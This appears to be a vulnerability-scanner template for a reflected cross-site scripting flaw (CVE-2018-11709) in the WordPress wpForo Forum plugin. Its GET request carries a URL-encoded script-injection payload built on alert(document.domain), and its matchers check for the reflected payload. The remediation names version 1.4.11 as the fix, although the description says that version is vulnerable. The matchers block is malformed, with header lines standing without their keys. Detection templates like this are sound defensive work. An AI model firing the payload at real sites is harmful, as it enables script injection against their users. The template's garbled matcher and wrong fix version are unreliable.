id: CVE-2018-11709
info:
name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11709
- https://wordpress.org/plugins/wpforo/#developers
- https://wpvulndb.com/vulnerabilities/9090
- https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11709
cwe-id: CWE-79
epss-score: 0.00151
epss-percentile: 0.51176
cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: gvectors
product: wpforo_forum
framework: wordpress
tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors
http:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
part: header
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502204c4f46cce9a1097999590e680c289a0c7e821fc0ccf2802777d3f355f69631ab022100e2fae5013b327f7fa3d04cc696b27c0194f2f9c03e38e58fb99f6b34e6704498:922c64590222798bb761d5b6d8e72950